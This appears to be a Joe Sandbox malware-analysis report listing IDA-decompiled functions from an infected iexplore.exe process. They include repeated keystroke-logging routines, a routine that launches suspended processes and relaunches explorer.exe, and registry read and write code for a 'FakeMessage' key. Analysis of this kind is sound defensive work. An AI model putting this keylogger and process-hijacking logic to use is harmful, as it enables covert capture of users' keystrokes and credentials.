C-Code - Quality: 80%

			E00C859E3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Separator]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Separator], xrefs: 00C859E5

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8584B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8584B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Backspace]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Backspace], xrefs: 00C8584D

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C36, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C36(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Help]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Help], xrefs: 00C85C38
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A16, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A16(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Tab]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Tab], xrefs: 00C85A18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85DE6, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboard

C-Code - Quality: 80%

			E00C85DE6(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Volume Up], xrefs: 00C85DE8
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83EA8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74
processsleep

C-Code - Quality: 100%

			E00C83EA8(WCHAR* __eax, struct _PROCESS_INFORMATION* __edx, void* __ebp) {
				struct _STARTUPINFOW _v80;
				void* _t12;
				struct _PROCESS_INFORMATION* _t27;
				WCHAR* _t35;
				void* _t36;

				_t27 = __edx;
				_t35 = __eax;
				_t36 = 0;
				E00C8291C();
				if(CreateProcessW(0, _t35, 0, 0, 0, 4, 0, 0,  &_v80, __edx) != 0) {
					_t36 = _t27->hProcess;
					E00C83D8C();
					_t2 =  &(_t27->dwProcessId); // 0xe70
					_t12 = E00C83E00( *_t2);
					_t40 = _t12 - 1;
					if(_t12 == 1) {
						TerminateProcess(_t27->hProcess, 0);
						E00C8291C();
						E00C8291C();
						if(CreateProcessW(0, E00C833A8(L"explorer.exe", 0xc83f74, _t40), 0, 0, 0, 4, 0, 0,  &_v80, _t27) == 0) {
							E00C8291C();
							E00C8291C();
							_t36 = 0;
							__eflags = 0;
						} else {
							_t36 =  *_t27;
						}
					}
					Sleep(0x64);
				}
				return _t36;
			}

APIs

CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5

Part of subcall function 00C83D8C: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C83D95
Part of subcall function 00C83D8C: GetProcAddress.KERNEL32(?,IsWow64Process,00000000,00C83DD5,?,?,?,00C83EE9), ref: 00C83DB4
Part of subcall function 00C83D8C: FreeLibrary.KERNEL32(?,00C83DDC,00C83DD5,?,?,?,00C83EE9), ref: 00C83DCF

Part of subcall function 00C83E00: GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
Part of subcall function 00C83E00: IsWow64Process.KERNEL32(00000000,?,00C91F1C), ref: 00C83E24
Part of subcall function 00C83E00: OpenProcess.KERNEL32(00000400,00000000,00000E70), ref: 00C83E46
Part of subcall function 00C83E00: IsWow64Process.KERNEL32(?,?,00000000,00C83E98,?,00000400,00000000,00000E70), ref: 00C83E6A
Part of subcall function 00C83E00: CloseHandle.KERNEL32(?), ref: 00C83E92

TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Sleep.KERNEL32(00000064), ref: 00C83F64

Strings

explorer.exe, xrefs: 00C83F2E

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C888D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
registry

C-Code - Quality: 100%

			E00C888D0(void* __eax, short* __edx, int _a4, int _a8, char* _a16) {
				void* _v8;
				void* _t17;
				short* _t18;

				_t17 = 0;
				RegCreateKeyW(__eax, __edx,  &_v8);
				if(RegSetValueExW(_v8, _t18, 0, _a4, _a16, _a8) == 0) {
					_t17 = 1;
				}
				RegCloseKey(_v8);
				return _t17;
			}

0x00c888d8
0x00c888e0
0x00c888ff
0x00c88901
0x00c88901
0x00c88907
0x00c88912

APIs

RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Strings

SOFTWARE\FakeMessage, xrefs: 00C888DE
FakeMessage, xrefs: 00C888D3, 00C888F3

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C89840, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
registry

C-Code - Quality: 100%

			E00C89840() {
				int _v8;
				int _v12;
				void* _v16;
				int _t13;

				_t13 = 0;
				if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\FakeMessage", 0, 1,  &_v12) == 0) {
					if(RegQueryValueExW(_v16, L"FakeMessage", 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
						_t13 = 1;
					}
					RegCloseKey(_v16);
				}
				return _t13;
			}

0x00c89844
0x00c8985c
0x00c8987d
0x00c89886
0x00c89886
0x00c8988c
0x00c8988c
0x00c89897

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
